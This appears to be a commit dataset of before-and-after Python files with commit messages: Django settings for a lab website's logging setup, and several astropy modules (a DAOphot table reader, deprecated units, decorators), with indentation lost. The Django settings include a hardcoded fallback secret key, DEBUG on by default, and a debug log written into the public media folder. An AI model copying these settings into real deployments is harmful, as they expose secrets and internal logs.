# Added to try and log problems to file to debug talk upload issue: https://github.com/jonfroehlich/makeabilitylabwebsite/issues/184
# For Log settings examples, see:
# 1. https://docs.djangoproject.com/en/1.11/topics/logging/#examples
# 2. https://gist.github.com/palewire/1740398#file-settings-py
# TODO: I had to comment this out because I couldn't get it to work on the production server
# perhaps due to file write permissions on the log. I need to investigate further.
# LOGGING = {
# 'version': 1,
# 'disable_existing_loggers': False,
# 'handlers': {
# 'file': {
# 'level': 'DEBUG',
# 'class': 'logging.FileHandler',
# 'filename': os.path.join(BASE_DIR, 'makeabilitylab_django.log'),
# },
# },
# 'loggers': {
# 'django': {
# 'handlers': ['file'],
# 'level': 'DEBUG',
# 'propagate': True,
# },
# },
# }
##DEBUG LOGGING FOR CSE SUPPORT SETUP
# TODO: commenting this out as it's only useful for debugging with Docker on test and production but breaks localhost dev (without docker)
# We can re-add this to debug in future and/or come up with a solution that doesn't break localhost dev.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': '/code/media/debug.log',
},
},
'loggers': {
'django': {
'handlers': ['file'],
'level': 'DEBUG',
'propagate': True,
},
},
}
# Application definition
INSTALLED_APPS = [
'website.apps.WebsiteConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# To use IPython-enabled Django shell through Django extensions
# pip3 install django_extensions
# python manage.py shell_plus
# https://opensourcehacker.com/2014/08/13/turbocharge-your-python-prompt-and-django-shell-with-ipython-notebook/
'django_extensions',
'image_cropping',
'easy_thumbnails',
'sortedm2m'
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'makeabilitylab.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'website.context_processors.recent_news'
],
},
},
]
WSGI_APPLICATION = 'makeabilitylab.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
if ALLOWED_HOSTS:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': config.get('Postgres', 'DATABASE'),
'USER': config.get('Postgres', 'USER'),
'PASSWORD': config.get('Postgres', 'PASSWORD'),
'HOST': config.get('Postgres', 'HOSTNAME'),
'PORT': '',
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME':'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'US/Eastern'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# JEF: I added these for uploading files.
# See:
# http://stackoverflow.com/questions/22570723/handling-uploading-image-django-admin-python
# https://github.com/axelpale/minimal-django-file-upload-example
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
# Thumbnail processing
# LS: from https://github.com/jonasundderwolf/django-image-cropping
from easy_thumbnails.conf import Settings as thumbnail_settings
THUMBNAIL_PROCESSORS = (
'image_cropping.thumbnail_processors.crop_corners',
) + thumbnail_settings.THUMBNAIL_PROCESSORS
added verbose logging to CSE loggers in setup.py
"""
Django settings for makeabilitylab project.
Generated by 'django-admin startproject' using Django 1.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
from configparser import ConfigParser
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Load a ConfigParser object from a file called config.ini at the base level
# of the django project.
config = ConfigParser()
config.read(os.path.join(BASE_DIR, 'config.ini'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
if config.has_option('Django', 'SECRET_KEY'):
SECRET_KEY = config.get('Django', 'SECRET_KEY')
else:
# We should never be in production with this key
SECRET_KEY = 'pe)-#st8rk!pomy!_1ha7=cpypp_(8%1xqmtw%!u@kw-f5&w^e'
# SECURITY WARNING: don't run with debug turned on in production!
# we will default to True if not overriden in the config file
if config.has_option('Django', 'DEBUG'):
DEBUG = config.getboolean('Django', 'DEBUG')
else:
DEBUG = True
# TODO: Take this out when done debugging production
# DEBUG = True
if config.has_option('Django', 'ALLOWED_HOSTS'):
USE_X_FORWARDED_HOST = True
ALLOWED_HOSTS = config.get('Django', 'ALLOWED_HOSTS').split(',')
else:
ALLOWED_HOSTS = []
# Added to try and log problems to file to debug talk upload issue: https://github.com/jonfroehlich/makeabilitylabwebsite/issues/184
# For Log settings examples, see:
# 1. https://docs.djangoproject.com/en/1.11/topics/logging/#examples
# 2. https://gist.github.com/palewire/1740398#file-settings-py
# TODO: I had to comment this out because I couldn't get it to work on the production server
# perhaps due to file write permissions on the log. I need to investigate further.
# LOGGING = {
# 'version': 1,
# 'disable_existing_loggers': False,
# 'handlers': {
# 'file': {
# 'level': 'DEBUG',
# 'class': 'logging.FileHandler',
# 'filename': os.path.join(BASE_DIR, 'makeabilitylab_django.log'),
# },
# },
# 'loggers': {
# 'django': {
# 'handlers': ['file'],
# 'level': 'DEBUG',
# 'propagate': True,
# },
# },
# }
##DEBUG LOGGING FOR CSE SUPPORT SETUP
# TODO: investigate commenting this out as it's only useful for debugging with Docker on test and production but breaks localhost dev (without docker)
# We can re-add this to debug in future and/or come up with a solution that doesn't break localhost dev.
# See: https://docs.djangoproject.com/en/2.0/topics/logging/
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': '/code/media/debug.log',
'formatter': 'verbose', # can switch between verbose and simple
},
},
'loggers': {
'django': {
'handlers': ['file'],
'level': 'DEBUG',
'propagate': True,
},
},
}
# Application definition
INSTALLED_APPS = [
'website.apps.WebsiteConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# To use IPython-enabled Django shell through Django extensions
# pip3 install django_extensions
# python manage.py shell_plus
# https://opensourcehacker.com/2014/08/13/turbocharge-your-python-prompt-and-django-shell-with-ipython-notebook/
'django_extensions',
'image_cropping',
'easy_thumbnails',
'sortedm2m'
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'makeabilitylab.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'website.context_processors.recent_news'
],
},
},
]
WSGI_APPLICATION = 'makeabilitylab.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
if ALLOWED_HOSTS:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': config.get('Postgres', 'DATABASE'),
'USER': config.get('Postgres', 'USER'),
'PASSWORD': config.get('Postgres', 'PASSWORD'),
'HOST': config.get('Postgres', 'HOSTNAME'),
'PORT': '',
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME':'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'US/Eastern'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# JEF: I added these for uploading files.
# See:
# http://stackoverflow.com/questions/22570723/handling-uploading-image-django-admin-python
# https://github.com/axelpale/minimal-django-file-upload-example
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
# Thumbnail processing
# LS: from https://github.com/jonasundderwolf/django-image-cropping
from easy_thumbnails.conf import Settings as thumbnail_settings
THUMBNAIL_PROCESSORS = (
'image_cropping.thumbnail_processors.crop_corners',
) + thumbnail_settings.THUMBNAIL_PROCESSORS
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""An extensible ASCII table reader and writer.
daophot.py:
Classes to read DAOphot table format
:Copyright: Smithsonian Astrophysical Observatory (2011)
:Author: Tom Aldcroft (aldcroft@head.cfa.harvard.edu)
"""
##
## Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## * Neither the name of the Smithsonian Astrophysical Observatory nor the
## names of its contributors may be used to endorse or promote products
## derived from this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
## ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
## WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
## DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
## DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
## (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
## LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
## ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
## SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import re
import numpy as np
from . import core
from . import basic
from . import fixedwidth
from ...utils import OrderedDict
class Daophot(core.BaseReader):
"""Read a DAOphot file.
Example::
#K MERGERAD = INDEF scaleunit %-23.7g
#K IRAF = NOAO/IRAFV2.10EXPORT version %-23s
#K USER = davis name %-23s
#K HOST = tucana computer %-23s
#
#N ID XCENTER YCENTER MAG MERR MSKY NITER \\
#U ## pixels pixels magnitudes magnitudes counts ## \\
#F %-9d %-10.3f %-10.3f %-12.3f %-14.3f %-15.7g %-6d
#
#N SHARPNESS CHI PIER PERROR \\
#U ## ## ## perrors \\
#F %-23.3f %-12.3f %-6d %-13s
#
14 138.538 INDEF 15.461 0.003 34.85955 4 \\
-0.032 0.802 0 No_error
The keywords defined in the #K records are available via the output table
``meta`` attribute::
>>> from astropy.io import ascii
>>> filename = os.path.join(ascii.__path__[0], 'tests/t/daophot.dat')
>>> data = ascii.read(filename)
>>> for name, keyword in data.meta['keywords'].items():
... print name, keyword['value'], keyword['units'], keyword['format']
...
MERGERAD INDEF scaleunit %-23.7g
IRAF NOAO/IRAFV2.10EXPORT version %-23s
USER name %-23s
< etc >
The units and formats are available in the output table columns::
>>> for colname in data.colnames:
... col = data[colname]
... print colname, col.units, col.format
...
ID None %-9d
XCENTER pixels %-10.3f
YCENTER pixels %-10.3f
< etc >
Any column values of INDEF are interpreted as a missing value and will be
masked out in the resultant table.
"""
def __init__(self):
core.BaseReader.__init__(self)
self.header = DaophotHeader()
self.inputter = core.ContinuationLinesInputter()
self.inputter.no_continue = r'\s*#'
self.data.splitter = fixedwidth.FixedWidthSplitter()
self.data.start_line = 0
self.data.comment = r'\s*#'
def write(self, table=None):
raise NotImplementedError
class DaophotHeader(core.BaseHeader):
"""Read the header from a file produced by the IRAF DAOphot routine."""
def __init__(self):
core.BaseHeader.__init__(self)
self.comment = r'\s*#K'
def update_meta(self, lines, meta):
"""
Extract table-level keywords for DAOphot table. These are indicated by
a leading '#K ' prefix.
"""
table_meta = meta['table']
# Read keywords as a table embedded in the header comments
comment_lines = [line for line in lines if line.startswith('#')]
if len(comment_lines) > 0:
re_header_keyword = re.compile(r'[#]K'
r'\s+ (?P<name> \w+)'
r'\s* = (?P<stuff> .+) $',
re.VERBOSE)
table_meta['keywords'] = OrderedDict()
for line in comment_lines:
m = re_header_keyword.match(line)
if m:
vals = m.group('stuff').strip().rsplit(None, 2)
keyword_dict = {'units': vals[-2],
'format': vals[-1]}
keyword_dict['value'] = (vals[0] if len(vals) > 2 else "")
table_meta['keywords'][m.group('name')] = keyword_dict
def get_cols(self, lines):
"""Initialize the header Column objects from the table ``lines`` for a DAOphot
header. The DAOphot header is specialized so that we just copy the entire BaseHeader
get_cols routine and modify as needed.
:param lines: list of table lines
:returns: list of table Columns
"""
# Parse a series of column defintion lines like below. There may be several
# such blocks in a single file (where continuation characters have already been
# stripped).
# #N ID XCENTER YCENTER MAG MERR MSKY NITER
# #U ## pixels pixels magnitudes magnitudes counts ##
# #F %-9d %-10.3f %-10.3f %-12.3f %-14.3f %-15.7g %-6d
coldef_lines = ['', '', '']
starts = ('#N ', '#U ', '#F ')
col_width = []
col_len_def = re.compile(r'[0-9]+')
re_colformat_def = re.compile(r'#F([^#]+)')
for line in lines:
if not line.startswith('#'):
break # End of header lines
else:
formatmatch = re_colformat_def.search(line)
if formatmatch:
form = formatmatch.group(1).split()
width = ([int(col_len_def.search(s).group()) for s in form])
# original data format might be shorter than 80 characters
# and filled with spaces
width[-1] = 80 - sum(width[:-1])
col_width.extend(width)
for i, start in enumerate(starts):
if line.startswith(start):
line_stripped = line[2:]
coldef_lines[i] = coldef_lines[i] + line_stripped
break
# At this point colddef_lines has three lines corresponding to column
# names, units, and format. Get the column names by splitting the
# first line on whitespace.
self.names = coldef_lines[0].split()
if not self.names:
raise core.InconsistentTableError('No column names found in DAOphot header')
ends = np.cumsum(col_width)
starts = ends - col_width
# If there wasn't a #U defined (not sure of DAOphot specification), then
# replace the empty line with the right number of ## indicators, which matches
# the DAOphot "no unit" tag.
for i, coldef_line in enumerate(coldef_lines):
if not coldef_line:
coldef_lines[i] = '## ' * len(self.names)
# Read the three lines as a basic table.
reader = core._get_reader(Reader=basic.Basic, comment=None)
reader.header.comment = None
coldefs = reader.read(coldef_lines)
# Create the list of io.ascii column objects
self._set_cols_from_names()
# Set units and format as needed.
for col in self.cols:
if coldefs[col.name][0] != '##':
col.units = coldefs[col.name][0]
if coldefs[col.name][1] != '##':
col.format = coldefs[col.name][1]
# Set column start and end positions. Also re-index the cols because
# the FixedWidthSplitter does NOT return the ignored cols (as is the
# case for typical delimiter-based splitters).
for i, col in enumerate(self.cols):
col.start = starts[col.index]
col.end = ends[col.index]
col.index = i
if hasattr(col, 'format'):
if any(x in col.format for x in 'fg'):
col.type = core.FloatType
elif 'd' in col.format:
col.type = core.IntType
elif 's' in col.format:
col.type = core.StrType
self.n_data_cols = len(self.cols)
# INDEF is the missing value marker
self.data.fill_values.append(('INDEF', '0'))
Replace docstring < etc > with ... so doctest will work
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""An extensible ASCII table reader and writer.
daophot.py:
Classes to read DAOphot table format
:Copyright: Smithsonian Astrophysical Observatory (2011)
:Author: Tom Aldcroft (aldcroft@head.cfa.harvard.edu)
"""
##
## Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## * Neither the name of the Smithsonian Astrophysical Observatory nor the
## names of its contributors may be used to endorse or promote products
## derived from this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
## ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
## WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
## DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
## DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
## (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
## LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
## ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
## SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import re
import numpy as np
from . import core
from . import basic
from . import fixedwidth
from ...utils import OrderedDict
class Daophot(core.BaseReader):
"""Read a DAOphot file.
Example::
#K MERGERAD = INDEF scaleunit %-23.7g
#K IRAF = NOAO/IRAFV2.10EXPORT version %-23s
#K USER = davis name %-23s
#K HOST = tucana computer %-23s
#
#N ID XCENTER YCENTER MAG MERR MSKY NITER \\
#U ## pixels pixels magnitudes magnitudes counts ## \\
#F %-9d %-10.3f %-10.3f %-12.3f %-14.3f %-15.7g %-6d
#
#N SHARPNESS CHI PIER PERROR \\
#U ## ## ## perrors \\
#F %-23.3f %-12.3f %-6d %-13s
#
14 138.538 INDEF 15.461 0.003 34.85955 4 \\
-0.032 0.802 0 No_error
The keywords defined in the #K records are available via the output table
``meta`` attribute::
>>> from astropy.io import ascii
>>> filename = os.path.join(ascii.__path__[0], 'tests/t/daophot.dat')
>>> data = ascii.read(filename)
>>> for name, keyword in data.meta['keywords'].items():
... print name, keyword['value'], keyword['units'], keyword['format']
...
MERGERAD INDEF scaleunit %-23.7g
IRAF NOAO/IRAFV2.10EXPORT version %-23s
USER name %-23s
...
The units and formats are available in the output table columns::
>>> for colname in data.colnames:
... col = data[colname]
... print colname, col.units, col.format
...
ID None %-9d
XCENTER pixels %-10.3f
YCENTER pixels %-10.3f
...
Any column values of INDEF are interpreted as a missing value and will be
masked out in the resultant table.
"""
def __init__(self):
core.BaseReader.__init__(self)
self.header = DaophotHeader()
self.inputter = core.ContinuationLinesInputter()
self.inputter.no_continue = r'\s*#'
self.data.splitter = fixedwidth.FixedWidthSplitter()
self.data.start_line = 0
self.data.comment = r'\s*#'
def write(self, table=None):
raise NotImplementedError
class DaophotHeader(core.BaseHeader):
"""Read the header from a file produced by the IRAF DAOphot routine."""
def __init__(self):
core.BaseHeader.__init__(self)
self.comment = r'\s*#K'
def update_meta(self, lines, meta):
"""
Extract table-level keywords for DAOphot table. These are indicated by
a leading '#K ' prefix.
"""
table_meta = meta['table']
# Read keywords as a table embedded in the header comments
comment_lines = [line for line in lines if line.startswith('#')]
if len(comment_lines) > 0:
re_header_keyword = re.compile(r'[#]K'
r'\s+ (?P<name> \w+)'
r'\s* = (?P<stuff> .+) $',
re.VERBOSE)
table_meta['keywords'] = OrderedDict()
for line in comment_lines:
m = re_header_keyword.match(line)
if m:
vals = m.group('stuff').strip().rsplit(None, 2)
keyword_dict = {'units': vals[-2],
'format': vals[-1]}
keyword_dict['value'] = (vals[0] if len(vals) > 2 else "")
table_meta['keywords'][m.group('name')] = keyword_dict
def get_cols(self, lines):
"""Initialize the header Column objects from the table ``lines`` for a DAOphot
header. The DAOphot header is specialized so that we just copy the entire BaseHeader
get_cols routine and modify as needed.
:param lines: list of table lines
:returns: list of table Columns
"""
# Parse a series of column defintion lines like below. There may be several
# such blocks in a single file (where continuation characters have already been
# stripped).
# #N ID XCENTER YCENTER MAG MERR MSKY NITER
# #U ## pixels pixels magnitudes magnitudes counts ##
# #F %-9d %-10.3f %-10.3f %-12.3f %-14.3f %-15.7g %-6d
coldef_lines = ['', '', '']
starts = ('#N ', '#U ', '#F ')
col_width = []
col_len_def = re.compile(r'[0-9]+')
re_colformat_def = re.compile(r'#F([^#]+)')
for line in lines:
if not line.startswith('#'):
break # End of header lines
else:
formatmatch = re_colformat_def.search(line)
if formatmatch:
form = formatmatch.group(1).split()
width = ([int(col_len_def.search(s).group()) for s in form])
# original data format might be shorter than 80 characters
# and filled with spaces
width[-1] = 80 - sum(width[:-1])
col_width.extend(width)
for i, start in enumerate(starts):
if line.startswith(start):
line_stripped = line[2:]
coldef_lines[i] = coldef_lines[i] + line_stripped
break
# At this point colddef_lines has three lines corresponding to column
# names, units, and format. Get the column names by splitting the
# first line on whitespace.
self.names = coldef_lines[0].split()
if not self.names:
raise core.InconsistentTableError('No column names found in DAOphot header')
ends = np.cumsum(col_width)
starts = ends - col_width
# If there wasn't a #U defined (not sure of DAOphot specification), then
# replace the empty line with the right number of ## indicators, which matches
# the DAOphot "no unit" tag.
for i, coldef_line in enumerate(coldef_lines):
if not coldef_line:
coldef_lines[i] = '## ' * len(self.names)
# Read the three lines as a basic table.
reader = core._get_reader(Reader=basic.Basic, comment=None)
reader.header.comment = None
coldefs = reader.read(coldef_lines)
# Create the list of io.ascii column objects
self._set_cols_from_names()
# Set units and format as needed.
for col in self.cols:
if coldefs[col.name][0] != '##':
col.units = coldefs[col.name][0]
if coldefs[col.name][1] != '##':
col.format = coldefs[col.name][1]
# Set column start and end positions. Also re-index the cols because
# the FixedWidthSplitter does NOT return the ignored cols (as is the
# case for typical delimiter-based splitters).
for i, col in enumerate(self.cols):
col.start = starts[col.index]
col.end = ends[col.index]
col.index = i
if hasattr(col, 'format'):
if any(x in col.format for x in 'fg'):
col.type = core.FloatType
elif 'd' in col.format:
col.type = core.IntType
elif 's' in col.format:
col.type = core.StrType
self.n_data_cols = len(self.cols)
# INDEF is the missing value marker
self.data.fill_values.append(('INDEF', '0'))
|
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This package defines deprecated units.
These units are not available in the top-level `astropy.units`
namespace. To use these units, you must import the `astropy.units.deprecated`
module::
>>> from astropy.units import deprecated
>>> q = 10. * deprecated.emu # doctest: +SKIP
To include them in `~astropy.units.UnitBase.compose` and the results of
`~astropy.units.UnitBase.find_equivalent_units`, do::
>>> from astropy.units import deprecated
>>> deprecated.enable() # doctest: +SKIP
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
_ns = globals()
def _initialize_module():
# Local imports to avoid polluting top-level namespace
from . import cgs
from . import astrophys
from .core import def_unit, _add_prefixes
def_unit(['emu'], cgs.Bi, namespace=_ns,
doc='Biot: CGS (EMU) unit of current')
# Add only some *prefixes* as deprecated units.
_add_prefixes(astrophys.jupiterMass, namespace=_ns, prefixes=True)
_add_prefixes(astrophys.earthMass, namespace=_ns, prefixes=True)
_add_prefixes(astrophys.jupiterRad, namespace=_ns, prefixes=True)
_add_prefixes(astrophys.earthRad, namespace=_ns, prefixes=True)
_initialize_module()
###########################################################################
# DOCSTRING
# This generates a docstring for this module that describes all of the
# standard units defined here.
from .utils import generate_unit_summary as _generate_unit_summary # noqa
from .utils import generate_prefixonly_unit_summary as _generate_prefixonly_unit_summary # noqa
if __doc__ is not None:
__doc__ += _generate_unit_summary(globals())
def enable():
"""
Enable deprecated units so they appear in results of
`~astropy.units.UnitBase.find_equivalent_units` and
`~astropy.units.UnitBase.compose`.
This may be used with the ``with`` statement to enable deprecated
units only temporarily.
"""
# Local import to avoid cyclical import
from .core import add_enabled_units
# Local import to avoid polluting namespace
import inspect
return add_enabled_units(inspect.getmodule(enable))
fix missing call to _generate_prefixonly_unit_summary
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This package defines deprecated units.
These units are not available in the top-level `astropy.units`
namespace. To use these units, you must import the `astropy.units.deprecated`
module::
>>> from astropy.units import deprecated
>>> q = 10. * deprecated.emu # doctest: +SKIP
To include them in `~astropy.units.UnitBase.compose` and the results of
`~astropy.units.UnitBase.find_equivalent_units`, do::
>>> from astropy.units import deprecated
>>> deprecated.enable() # doctest: +SKIP
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
_ns = globals()
def _initialize_module():
# Local imports to avoid polluting top-level namespace
from . import cgs
from . import astrophys
from .core import def_unit, _add_prefixes
def_unit(['emu'], cgs.Bi, namespace=_ns,
doc='Biot: CGS (EMU) unit of current')
# Add only some *prefixes* as deprecated units.
_add_prefixes(astrophys.jupiterMass, namespace=_ns, prefixes=True)
_add_prefixes(astrophys.earthMass, namespace=_ns, prefixes=True)
_add_prefixes(astrophys.jupiterRad, namespace=_ns, prefixes=True)
_add_prefixes(astrophys.earthRad, namespace=_ns, prefixes=True)
_initialize_module()
###########################################################################
# DOCSTRING
# This generates a docstring for this module that describes all of the
# standard units defined here.
from .utils import generate_unit_summary as _generate_unit_summary # noqa
from .utils import generate_prefixonly_unit_summary as _generate_prefixonly_unit_summary # noqa
if __doc__ is not None:
__doc__ += _generate_unit_summary(globals())
__doc__ += _generate_prefixonly_unit_summary(globals())
def enable():
"""
Enable deprecated units so they appear in results of
`~astropy.units.UnitBase.find_equivalent_units` and
`~astropy.units.UnitBase.compose`.
This may be used with the ``with`` statement to enable deprecated
units only temporarily.
"""
# Local import to avoid cyclical import
from .core import add_enabled_units
# Local import to avoid polluting namespace
import inspect
return add_enabled_units(inspect.getmodule(enable))
|
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Sundry function and class decorators."""
import functools
import inspect
import textwrap
import threading
import types
import warnings
from inspect import signature
from functools import wraps
from .exceptions import (AstropyDeprecationWarning, AstropyUserWarning,
AstropyPendingDeprecationWarning)
__all__ = ['classproperty', 'deprecated', 'deprecated_attribute',
'deprecated_renamed_argument', 'format_doc',
'lazyproperty', 'sharedmethod', 'wraps']
_NotFound = object()
def deprecated(since, message='', name='', alternative='', pending=False,
obj_type=None, warning_type=AstropyDeprecationWarning):
"""
Used to mark a function or class as deprecated.
To mark an attribute as deprecated, use `deprecated_attribute`.
Parameters
------------
since : str
The release at which this API became deprecated. This is
required.
message : str, optional
Override the default deprecation message. The format
specifier ``func`` may be used for the name of the function,
and ``alternative`` may be used in the deprecation message
to insert the name of an alternative to the deprecated
function. ``obj_type`` may be used to insert a friendly name
for the type of object being deprecated.
name : str, optional
The name of the deprecated function or class; if not provided
the name is automatically determined from the passed in
function or class, though this is useful in the case of
renamed functions, where the new function is just assigned to
the name of the deprecated function. For example::
def new_function():
...
oldFunction = new_function
alternative : str, optional
An alternative function or class name that the user may use in
place of the deprecated object. The deprecation warning will
tell the user about this alternative if provided.
pending : bool, optional
If True, uses a AstropyPendingDeprecationWarning instead of a
``warning_type``.
obj_type : str, optional
The type of this object, if the automatically determined one
needs to be overridden.
warning_type : warning
Warning to be issued.
Default is `~astropy.utils.exceptions.AstropyDeprecationWarning`.
"""
method_types = (classmethod, staticmethod, types.MethodType)
def deprecate_doc(old_doc, message):
"""
Returns a given docstring with a deprecation message prepended
to it.
"""
if not old_doc:
old_doc = ''
old_doc = textwrap.dedent(old_doc).strip('\n')
new_doc = (('\n.. deprecated:: {since}'
'\n {message}\n\n'.format(
**{'since': since, 'message': message.strip()})) + old_doc)
if not old_doc:
# This is to prevent a spurious 'unexpected unindent' warning from
# docutils when the original docstring was blank.
new_doc += r'\ '
return new_doc
def get_function(func):
"""
Given a function or classmethod (or other function wrapper type), get
the function object.
"""
if isinstance(func, method_types):
func = func.__func__
return func
